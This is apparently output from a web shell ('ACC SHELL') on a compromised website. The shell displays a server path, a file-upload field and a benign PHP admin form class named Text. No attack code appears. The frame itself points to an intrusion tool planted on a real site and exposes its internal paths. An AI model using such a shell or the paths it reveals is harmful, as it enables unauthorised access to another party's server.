ACC SHELL

Path : /srv/www/vhosts/profias/inc/admin/
File Upload :
Current File : /srv/www/vhosts/profias/inc/admin/text.php

<?php

  class Text extends AdminItem
  {
    
    function Text($args)
    {
      $this->setBasicParametres($args);
    }
  
  
  

    function getFormParams($admin)
    {
      $result=array(
        'type'=>'text',
        'name'=>$this->formName,
        'value'=>$this->default,
        'reg'=>$this->reg,
        'css_id'=>$this->id,
        'css_class'=>$this->class,
        'spec'=>$this->spec,
        'label'=>$this->name,
        'label_id'=>$this->labelId,
        'label_class'=>$this->labelClass,
        'table'=>$admin->table,
      );

      return array($result);
    }


    

  }


?>

ACC SHELL 2018